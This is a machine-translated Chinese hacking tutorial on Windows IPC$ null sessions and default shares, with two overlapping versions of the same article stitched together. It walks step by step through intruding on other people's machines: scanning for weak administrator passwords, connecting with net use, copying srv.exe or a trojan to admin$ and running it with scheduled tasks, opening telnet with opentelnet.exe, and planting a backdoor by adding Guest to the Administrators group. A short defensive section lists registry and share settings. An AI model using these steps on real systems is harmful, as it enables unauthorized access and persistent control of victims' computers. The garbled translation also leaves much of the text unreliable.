A PC $ command detailed the article about IPC $ intrusion can be described as cow, and no shortage, the attack step can even say that it has become a classic model, so no one is willing to take this a set of things. But though this, but I personally think that these articles are not detailed. For the first time I contact IPC $ rookie, simple Russen steps don't answer their confused (you just find a HACK forum to search. IPC, how much is it? III is what IPC $ IPC $ (Internet Process Connection) is a resource shared "named pipe" (everyone said this), it is named to make the process to name Pipeline, you can get the appropriate permissions by verifying the username and password, using the remote management computer and the shared resource to view the computer. With IPC $, the connectors can even create an empty connection with the target host without the username and password (of course, the other machine must open IPC $ sharing, otherwise you can't connect), and use this empty connection, The connector can also get a list of users on the target host (but the responsible administrator will prohibit the export user list). We are always talking about IPC $ vulnerability IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, it is to facilitate administrator's remote management and open remote network login function, but also open the default sharing, ie all Logic disk (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $). All of these, the original intention is to facilitate the management of the administrator, but the original intention does not necessarily have a good job, some don't have the heart (what is intention? I don't know, the pronoun is one) will take advantage of IPC $, access sharing Resources, export users list, and use some dictionary tools to perform password probing, hoping to achieve higher permissions, thus achieving non-maribei purposes. Squi: 1) IPC connection is a unique remote in Windows NT and above Network login feature, its functionality is equivalent to Telnet in UNIX, because IPC $ features need to use a lot of DLL functions in Windows NT, so you cannot run in Windows 9.x.
That is to say, only NT / 2000 / XP can be established IPC $ connection, 98 / ME can't create IPC $ Connection (but some friends said to build an empty connection in 98, I don't know if it is true, but now 2003 Year, I suggest that 98 comrades change the system, 98 is not cool) 2) Even if it is empty connection, it can be established. If the other party closes IPC $ sharing, you still have no connection 3) is not to establish The IPC $ Connection can view the other party's user list, as administrators can disable the export user list three to establish IPC $ Connection in the HACK attack, just as mentioned above, even if you have established an empty connection, you can also Get a lot of information (and this information is often an invaded), the access part is shared, if you can log in as a user with certain permissions, then you will get the appropriate permissions, obviously, if You log in as an administrator, 嘿嘿, don't have to say more, what u want, u can do !! (Basically, you can get the target information, manage the target process and service, upload the treasure horse and run, if 200RERVER, you can also consider opening the terminal service convenient control. How? It's enough!) But you don't want to be too early, because the administrator's password is not so good, although there will be some silly administrators Air password or mentally ministeptic password, but this is a few, and now it is not in the past, as people's safety awareness is improved, the administrators have become more careful, get the administrator's password will be more and more difficult: (So you have the biggest future The possibility is to connect with minimal permissions, and you will slowly discover IPC $ connection is not universal, even when the host does not turn on IPC $ sharing, you can't connect it. So I think, you Don't treat IPC $ invading as an ultimate weapon, don't think it's a battle, it is like a pass before the football field, rarely has a fatal effect, but it is indispensable, I think this It is the meaning of IPC $ connected to the Hack invasion. Four IPC $ with empty connection, 139, 445 port, the default shared relationship The above relationship The relationship between the above four may be a problem with the rookie very confused, but most of the articles are not special. Explain, in fact, I understand is not very thorough, all of which have been summed up in communication with everyone. (A BBS with a good discussion, can be said to be a rookie paradise) 1) IPC $ with empty connection: No need for username The password IPC $ connection is empty. Once you log in with a user or administrator (ie, IPC $ connected to a specific username and password), you can't be called empty connection. Many people may ask Since I can connect, then I will open it in the future. Why do I have to scan a weak password? Hao, I mentioned before, when you log in, you don't have any permissions (Very depressed), and you When the user or administrator logs in, you will have the corresponding permissions (who is permission doesn't want, so still old and old, don't be lazy) .2) IPC $ with 139,445 port: IPC $ connection can achieve remote Log in and access to the default sharing; while the 139 port is opened to indicate the application of the NetBIOS protocol, we can implement access to the shared file / printer through the 139,445 (Win2000) port, so general, IPC $ connection is a 139 or 445 port Support .3) IPC $ with the default sharing default sharing is to facilitate administrator remote management and the default open share (you can of course turn off it), all logical disks (C $, D $, E $ ...) And system catalog Winnt or Windows (admin $), we can implement access to these default sharing (provided that the other party does not turn off these default sharing) Five IPC $ Connection Failure The following five reasons are more common: 1) Your system is not NT or more * as a system; 2) The other party does not open IPC $ default sharing 3) The other party does not open 139 or 445 port (puzzle firewall mask) 4) Your command is incorrect (such as lack of space Wait) 5) Username or password error (empty connection is of course, it doesn't matter), you can also analyze the cause according to the returned error number: Error number 5, refuse to access: Very likely that the users you use are not administrator privileges, first improve Permissions; error number 51, Windows can't find network path: network has problems; error number 53, no network path: IP address error; goal is not boot; target LanmanServer service is not started; target has firewall (port filtering); Error number 67, I can't find the network name:
Your LanmanWorkStation service is not started; the target deletes IPC $; error number 1219, the credentials provided with existing credentials: You have established an IPC $ with the other party, please delete. Error number 1326, unknown user name or error password: The reason is obvious; error number 1792, trying to log in, but network login service is not started: The target Netlogon service is not started. (This condition will appear in connection domain) Error number 2242, this user's password has expired: the target has an account policy, enforces the change in periodic requirements. Regarding IPC $, there is more complex problems. In addition to the above reasons, there will be some other uncertain factors, and this person cannot be detailed, it depends on everyone's own experience and trial. Six how to open the target IPC $ (This section is from related articles) First you need a shell that does not rely on IPC $, such as SQL's CMD extension, Telnet, Trojan, of course, this shell must be admin privileges, then you can use the shell to execute the command NET Share IPC $ is open to IPC $. From above, IPC $ can use there much of use. Please confirm that the relevant services have been running. If you don't start it (don't know how to do it, please see the usage of the NET command), or if you don't work (such as a firewall, killing) It is recommended to give up. Seven how to prevent IPC $ invading 1 Prohibit empty connection to enumerate (this * does not block the establishment of empty connections, leading from "Anatomy Win2000 under Empty Fair") First Running Regedit, find the following group [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / Control / LSA] Change the key value of Restrictanonymous = DWORD to: 00000001 (If set to 2, there are some problems that will happen, such as some Win services, problems, etc.) 2 Prohibit the default sharing 1) Locally shared resource operation - CMD-Enter Net Share2) Delete Sharing (One Enter One) NET Share IPC $ / DeleTeNet Share Admin $ / DeleTeNet Share C $ / DeleTeNet Share D $ / Delete (if there is e, f, ... can continue to delete) 3) Stop Server Service Net Stop Server / Y (Restart After the Server service will be reopened) 4) Modify the registry running -RegeditServer version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] to put autoshareserver (dword) The key value is changed to: 00000000. Pro version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShaRewks (DWORD) to: 00000000. If the primary key mentioned above does not exist, you will be built (right-click-new-double-byte value) a primary and re-change key value.
3 Permanently shut down IPC $ and default sharing dependence: LanmanServer, Server Server Service Control Panel - Administrative Tools - Services - Find Server Services - Properties - Regular - Start Type - Disabled 4 Installed Firewall (Select Related Settings), Or port filtering (filtered out 139, 445, etc.), or set complex passwords with new version of the optimization master 5 to prevent it from establishing an empty connection: NET USE // IP / IPC $ "/ user : "" (Must pay attention to: This line of command contains 3 spaces) 2) Establish a non-empty connection: NET USE // IP / IPC $ "User Name" / user: "Password" (same as 3 spaces) 3) Mapping Default Sharing: NET USE Z: // IP / C $ "Password" / user: "User Name" (you can map the other party C disk to your own Z disk, other disk classes) If you have established with your goals IPC $, you can directly use IP driven $ access, specific command NET USE Z: // IP / C $ 4) Delete an IPC $ / DEL 5) Delete Shared Map Net Use C: / DEL deletes the mapped C disk, other disk classes push net use * / del delete, there will be prompts to press Y to confirm that nine classic intrusion patterns are too classic, most IPC tutorials have introduced, I also After taking it, I would like to thank the original creator! (I don't know which seniors) 11. C: /> NET USE //127.0.0.1/IPC $ "Password" / user: "User Name" generally uses streamer, pass Scanning the weak password to get, administrator account and password .2. C: /> Copy srv.exe //127.0.1/admin $ 1 copy SRV.EXE, there is a directory directory (here is Refers to the c: / winnt / system32 / of the admin user, you can also use C $, D $, meaning the C disk with the D disk, see where you want to copy it). 3. C: /> Net Time //127.0.0.1 Investigation Time, found 127.0.0.1 The current time of 127.0.0.1 is 2004/6/15 11:00 am, and the command successfully completed. 4. C: /> AT //127.0.0.1 11:05 srv.exe Start SRV.EXE Bar 5. C: /> Net Time //127.0.0.1 ■ No time? If the current time of 127.0.0.1 is 2004/6/15 11:05 am, then prepare to start the following command. 6. C: /> Telnet 127.0.0.1 99 This will use the telnet command, pay attention to the port is 99. The Telnet default is the 23-port, but we use SRV to create a 99-port for us in the other party. Although we can go on Telnet, SRV is a one-time, and then activated next time! So we intend to build a Telnet service! This is to use NTLM 7.c: /> Copy ntlm.exe //127.0.0.1/admin $ Add NTLM.exe to the host with a copy command (NTLM.exe is also in the "Dream" Tools directory) . 8. C: / Winnt / System32> NTLM Enter NTLM Start (here C: / Winnt / System32> refers to the other party, running NTLM actually let this program run on the other computer). When "DONE" appears, it will be normal.
Then use "Net Start Telnet" to open the Telnet service! 9. Telnet 127.0.0.1, then enter the username and password to enter the other party, * is as simple as it is on DOS *! (And then what do you want to do? What do you want to do, haha? In order to prevent everyone, we will add Guest to the management group 10. C: /> net user guest / active: YES to make the other party guest users Activation 11. C: /> Net User Guest 1234 change the Guest's password to 1234, or the password you want to set 12. C: /> NET localGroup Administrators Guest / Add will change the guest to Administrator (if the admin password changes, If the guest account has not changed, the next time we can use Guest to visit this computer again)
IPC $ detailed explanation The article on IPC $ invading online can be described as cow, and there is no shortage, and the attack step can even say that it has become a classic model. Therefore, no one is willing to take this. Play. But though said, but I personally think that these articles are not detailed. For the first time you have exposed to IPC $, you can't answer their confused. (You just find a HACK forum to search. IPC $, see how much the existence is. So I refer to some information, tutorials and forum posts on the Internet, write this summary of the nature, I want to make some easier confusion, easy to confuse the question, let everyone don't always be in the same place! Note: Discussion this article Both of the Win NT / 2000 in the WIN NT / 2000 environment, Win98 will not be discussed in this discussion, and given that Win XP has improved on security settings, individual * does not apply, there is an opportunity to discuss separately. II What is IPC $ IPC $ (Internet Process Connection) is a resource shared "named pipe", which is a named pipe that opens inter-process communication and open by providing trusted username and password, connecting both sides to establish a secure channel. And exchange of encrypted data in this channel, thereby implementing access to remote computers. IPC $ is a new feature of NT / 2000, which has a feature that only one connection is allowed between two IPs within the same time. NT / 2000 also opens the default sharing while providing IPC $ feature, all logical sharing (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $) shared. All of these, Microsoft's original intention is to facilitate administrator management, but in interested in unintentional, there is a decrease in system security. Usually we can always hear someone who is saying IPC $ vulnerability, IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, I think someone says this, must refer to Microsoft's own 'back door': empty A null session. So what is empty conversation? Three What is an empty session before introducing an empty session, we need to understand how a security meeting is established. In Windows NT 4.0, the Challenge Response Agreement is used to establish a session with the remote machine. The establishment of a successful session will become a secure tunnel, establishing the two parties through it through it, the process of the process is as follows: 1) Session requestor (customer) Send a packet to the session receiver (server), requiring the establishment of the security tunnel; 2) The server generates a random 64-bit number (implementation challenge) transfer back to customers; 3) The customer gets the 64-bit number generated by the server The password that tries to establish a session, returns the result to the server (implement response); 4) After receiving the response, send to local security verification (LSA), LSA verifies the response by using the user's correct password to confirm the request Identity. If the requester's account is the local account of the server, verify local; if the requested account is a domain account, the response is transmitted to the domain controller to verify. When the response to the challenge is verified correctly, an access token is generated, and then transmitted to the customer. Customers use this access token to connect to resources on the server until the suggested session is terminated.
The above is a rough process established by a security conference. What is the empty session? The empty board is a session established with the server without trust (ie, the user name and password is not provided), but according to the Win2000 access control model, the establishment of the empty space will also provide a token, but the empty session is in the process of establishing There is no authentication of user information, so this token does not contain user information, so this session does not allow the system to send encrypted information, but this does not mean that there is no security identifier SID in the token of the empty session (it identifies User and site), for an empty box, the token of the LSA is S-1-5-7, this is the SID of the empty session, the username is: Anonymous Logon (this username is available in the user list As seen in the SAM database, it is not found in the SAM database), this access token contains the following group: Everyone Network will be authorized to access the above two in the security policy limit. The group has the right to access all information. So what can I do if I build an empty session? What is the four empty session to do for NT, with the default security settings, with an empty connection, you can list the users and shares on the target host, access the sharing of Everyone privilege, access a small part of the registry, etc., there is no much utilization value; The 2000 role is smaller, because in Windows 2000 and later, only administrators and backups are only available from the network to access the registry, and it is not convenient to achieve tools. From these we can see that this kind of non-credit session does not use, but from a complete IPC $ invading, empty space is an indispensable springboard because we can get a list from it, this is An older hacker is already enough. The following is the specific command that can be used in the empty session: 1 First, let's create an empty box (IPC $) command: NET USE // IP / IPC $ "" / user: "Note: The above command includes Four spaces, NET and USE have a space in the middle of the USE, one after the user, the password is around one space. 2 View Remote Host Sharing Resource Command: Net View // IP Interpretation: After establishing an empty connection, use this command to view the shared resource of the remote host, if it is shared, you can get the following similar results: on // * Shared resource resource resource shared name type Totto --------------------------------- ------------------------ Netlogon Disk Logon Server Share Sysvol Disk logon server share command successfully completed. 3 View the current time command of the remote host: NET Time // IP Interpretation: Use this command to get a remote host's current time.
4 Get the NetBIOS username list (need to open your own NBT) nbtstat -a ip with this command to get a NetBIOS username list (require your NetBIOS support), return to the following results: Node ipaddress: [* SCOPE ID: [] Netbios Remote Machine Name Table Name Type Status -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------- Server <00> Unique registered oyamanishi-h <00> Group registered oyamanishi-h <1c> Group register Server <20> Unique Registered Oyamanishi-h <1b> unique Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered ..__ MSBROWSE __. <01> GROUP Registered INet ~ Services <1C> GROUP Registered IS ~ SERVER ...... < 00> UNIQUE Registered Mac Address = 00-50-8B-9A-2D-37 is what we often use empty session, it seems to have a lot of things, but you should pay attention to it: Establish an IPC $ connected * Will leave a record in EventLog, no matter whether you log in success. Ok, then let's take a look at the ports used by IPC $? Five IPC $ User Let's take some basic knowledge: 1 SMBSERVER Message Block) Windows protocol, service for file printing sharing; 2 NBTNetBios Over TCP / IP) Use 137 (UDP) 138 (UDP) 139 ( The TCP) port implements the NetBIOS network interconnection based on TCP / IP protocol. 3 In WindowsNT, SMB is implemented based on NBT, and in Windows 2000, SMB can be implemented directly through a 445 port in addition to NBT implementation. With these basic knowledge, we can further discuss access to the network sharing to the port: For the Win2000 client: 1 If the server is allowed to connect the server, the client will try to access 139 and 445 port at the same time. If the 445 port has a response, then send the RST package to the 139 port disconnect, perform a session with a 455 port, only 139 ports are used when the 445 port does not respond, if the two ports do not respond, then the session failed; 2 If the server is connected to the server in the case of NBT, then the client will only try to access 445 ports, if the 445 port is no response, then the session fails. It can be seen that the Win 2000 after the NBT is banned will fail. For the Win2000 server side: 1 If NBT is allowed, the UDP port 137, 138, TCP ports 139, 445 will be open; 2 If NBT is prohibited, only 445 port is open. Our established IPC $ session is equally complied with the above principles.
Obviously, if the remote server does not listen to 139 or 445 port, IPC $ session cannot be created. The meaning of the six IPC $ connected in the HACK attack is like the above mentioned above, even if you have established an empty connection, you can also get a lot of information (and this information is often essential), if you If you can log in as a user with certain permissions, then you will get the appropriate permissions, obviously, if you log in as an administrator, hey, you can do it, basically, you can do it. But you don't want to be too early, because the administrator's password is not so good, although there will be some careful administrators have a weak pass, but this is a few, and now it is not previously, with people's safety awareness Increased, the administrators also be more careful, get the administrator's password will be more difficult, so your biggest possibility is to connect with minimal permissions or even no permissions, and even do not open IPC $ sharing in the host. When you can't connect, you will slowly discover IPC $ connection is not universal, so don't expect each connection to succeed, it is unrealistic. Is it some discouraged? It is also not, the key is that we have to appear mentality, don't treat IPC $ invading as an ultimate weapon, don't think it's a battle, it is just a kind of intrusion method, you may use it to kill, and there are Maybe it is nothing, these are normal, in the world of hackers, not every road to lead to Rome, but there is always a road to travel to Rome, patient look! Six IPC $ Connection Failure The following is a common reason for the failure of IPC $ Connection: 1 IPC connection is a unique feature in Windows NT and above, because it needs to use a lot of DLL functions in Windows NT, so you can't Run in the Windows 9.x / ME system, that is, only NT / 2000 / XP can establish IPC $ connected to each other, 98 / ME does not establish IPC $ connection; 2 If you want to successfully create an IPC $ connection, It is necessary to open IPC $ sharing, even if the empty connection is true, if the other party closes the IPC $ sharing, you will build a failure; 3 You have not launched the LanmanWorkStation service, it provides network link and communication, no you can't initiate a connection request (Display: Workstation); 4 Panel does not start the LANMANServer service, provides RPC support, file, print, and named pipe sharing, IPC $ relies on this service, without its remote host will not respond to your connection request (display name) For: Server; 5 other party did not start Netlogon, it supported the computer pass-through account login in the network; 6 other parties banned NBT (ie open 139 port); 7 other firewalls shielded 139 and 445 ports; 8 Your users Name or password error (obvious empty session excludes such an error); 9 command input error: maybe more spaces, when the username and password do not include the double quotes on both sides can be omitted, if the password is empty, you can Enter two quotation marks "", "10 If the other party restarts the computer in the case where the connection has been established, the IPC $ connection will be automatically disconnected and the connection is required.
In addition, you can also analyze the reason according to the returned error number: Error number 5, refuse to access: It is likely that the users you use are not administrator privileges, first improve the permissions; the error number 51, Windows cannot find the network path: network has problems; Error number 53, no network path: IP address error; the target is not boot; the target LanmanServer service is not started; the target has a firewall (port filtering); error number 67, find the network name: Your LanmanWorkStation service is not started or target Deleted IPC $; error number 1219, provided credentials and existing credentials set: You have established an IPC $ with each other, please delete again; error number 1326, unknown user name or error password: reason is obvious ; Error number 1792, trying to log in, but the network login service is not started: the target NetLogon service is not started; the error number 2242, this user's password has expired: the target has an account policy, enforces the regular requirements to change the password. The reason for the failure of the eight copy file Some friends have successfully established IPC $ connected, but when Copy has encountered such trouble, it cannot be copied, then what is the common cause of replication failure?
1 Blind copying This type of error occurs most, accounting for more than 50%. Many friends don't even know if the other party has a shared folder, which is blindly replicated, and the result is a very depressed and depressed. So I suggested that you must use the NET View // ip command before conducting a copy, don't think that IPC $ connection has been successfully established, you must have a shared folder. 2 Default Sharing Judgment Errors This type of error is also often crossed, mainly two small aspects: 1) Error thinking can establish an IPC $ connected to the host, will open the default sharing, so after the connection is completed, you immediately go to Admin. The default sharing replication file, which causes the copy to fail. IPC $ Connection Success You can only explain the other party to open IPC $ sharing, IPC $ sharing and default sharing are two yards, IPC $ sharing is a naming pipe, not which actual folder, and default sharing is not the necessary condition for IPC $ ; 2) Since Net View // IP cannot display the default share (because the default shared belt $), we cannot judge whether the other party opens the default share, so if the other party does not turn on the default sharing, then all to the default sharing The * is not successful; (but most scanning software can sweep to the default shared directory while sweeping the password, avoiding such errors) 3 User privileges are not enough, including four scenarios: 1) empty When the connection is copied to all shared (default sharing and normal sharing), most of the case is not enough; 2) When copying to the default, you must have administrator privileges; 3) When copying to normal sharing, there must be corresponding permissions (ie Access permission set by the other party); 4) The other party can prohibit external access sharing through the firewall or security software; it also needs to be explained: Don't think that administrator is an administrator, the administrator name can be changed. 4 Kill the firewall or in the LAN may be a successful copy * is successful, but when the remote is running, the firewall is killed, causing the file; also possible you to copy the Trojan to the host in the LAN, causing connectivity failure. Therefore, it is recommended that you have to copy it, otherwise you will give up. Oh, everyone knows that IPC $ is connected in the actual *, there will be a torrent problem during the process. The above summarizes is just some common mistakes. If you haven't said, you can only let yourself understand. Nine How to open the target IPC $ sharing and other shared target IPC $ not easy to open, otherwise it will be disrupted in the world. You need a shell of admin privilege, such as Telnet, Trojan, etc., then execute NET Share IPC $ to open the target's IPC $, with NET Share IPC $ / DEL to close the sharing. If you want to open a shared folder, you can use Net Share Baby = C: /, this will open its C on the shared name. Ten Some commands that need shell can do to see that many tutorials are very incorrect in this area, and some need shells can complete the command, which is a misleading.
Then I summarize the command that needs to be completed at the shell: 1 Establish the user to the remote host, activate the user, modify the user password, and join the management group * Do you need to complete it under the shell; 2 Open the IPC $ sharing of the remote host, default sharing Ordinary shared * is required to be completed under the shell; 3 Run / turn off the service of the remote host, you need to do it under the shell; 4 Start / kill the process of the remote host, you need to do it under the shell. The relevant commands that may be used in the 11 invasion Please note that the command can be used for local or remote. If applicable to the local, you can only execute it to the remote host after obtaining the shell of the remote host.
1 Create an empty connection: NET USE // IP / IPC $ "" / user: "2 Create a non-empty connection: NET USE // IP / IPC $" PSW "/ user:" Account "3 View remote host shared resources (But I don't see default sharing) NET View // IP 4 View local host shared resources (you can see Local default sharing) NET Share 5 Get user name list NBTSTAT -A IP 6 get a list of user lists from local hosts NET User 7 View Remote Host Net Time // IP 8 Display Local Host Current Services NET Start 9 Start / Off Local Service NET Start Service Name / Y Net STOP Service Name / Y 10 Mapping Remote Sharing: Net Use Z: / / Ip / baby This command maps shared resource named Baby to z-disk 11 Delete Sharing Map NET USE C: / DEL Delete Mapping C Dish, other disk classes to push NET USE * / del / y Delete all 12 to remote host Copy file COPY / Path /SRV.exe // ip / shared directory name, such as: copy ccbirds.exe //*.*.*.*C to copy files under the current directory to the other C drive 13 remote add plan Task AT // IP Time Programming, such as: AT //127.0.0.0 11:00 Love.exe Note: Time to use 24 hours; do not use the path without adding the path under system default search path (such as system32 /), otherwise you must add All Path 14 Totel Telnet with Remote Hosts To use a small program: Opentelnet.exe, all major download sites are available, but also need to meet four requirements: 1) Target open IPC $ sharing 2) You have an administrator Password and account 3) Target Open RemoteRegistry service, users are valid for Win2K / XP, NT untested command format: opentelnet.exe // server account PSW NTLM authentication Port Examples are as follows: C: /> Opentelnet.exe //*.*.*.* Administrator "" 1 90 15 Activate users / joined administrator group 1 NET UESR Account / Active: Yes 2 Net localgroup administrators Account / Add 16 Turn off the remote host Telne T also needs a small program: resumeTelnet.exe command format: ResumeTelNet.exe // Server Account PSW Examples are as follows: c: /> resumetelnet.exe //*.*.*. "" 17 Delete a established IPC $ Connection NET USE // IP / IPC $ / DEL (this tutorial is not updated regularly, please pay the latest version, please visit the official website: Cuisine Bird Community Original http://ccbirds.yeah.net) Twelve IPC $ Full Invasion Steps Xiangxiang actually invaded steps vary with individual hobbies, I will talk about common, huh, huh, show ugly! 1 Search with the scanning software, the host, such as streamer, SSS, X-scan, etc., follow you, then lock the target, if you sweep the password of the administrator privilege, you can make the following steps,
Suppose you get the password of Administrator is empty 2 At this point you have two ways to choose: Either open the telnet (command line), or give it a trembie (graphical interface), then let's take the road this road first. Let's open the telnet's command to use it. If you want to use the Opentelnet, this applet c: /> opentelnet.exe ///192.168.21.********************* ******************************************* Remote Telnet Configure, By refDom@263.net opentelnet.exe usagepentelnet.exe // server username password ntlmauthor telnetport ********************************************** ******************************************** CONNECTING //192.168.21.*...suCcessFully! Notice !!!!!! The Telnet Service default setting: NTLMAuthor = 2 TelnetPort = 23 Starting telnet service ... telnet service is started successfully telnet service is running BINGLE !!! Yeah !! Telnet Port is 90. You can try:!! "telnet ip 90", to connect The Server! Disconnecting Server ... SuccessFully! * Description You have already opened a Telnet of a port 90. 4 Now we telnet on telnet 192.168.21. * 90 If success, you will get a shell of the remote host. At this point you can control your broiler like your machine, do you do something? To activate the Guest to join the management group, even if you leave a latter 5 c: Yes * activate the guest user, and possibly people's guests are trying to live, you can use Net user guest. The value enabled by its account is YES or no 6 c: /> net user guest 1234 * change the Guest's password to 1234, or change your favorite password 7 c: /> net localgroup administrators guest / add * will guest Changed to Administrator, so that even after the administrator changed his password, we can also log in with Guest, but also remind you, because through security policy settings, you can prohibit remote access such as Guest and other accounts, huh, if it is true. In this way, then our back door is also white, and God will bless Guest.
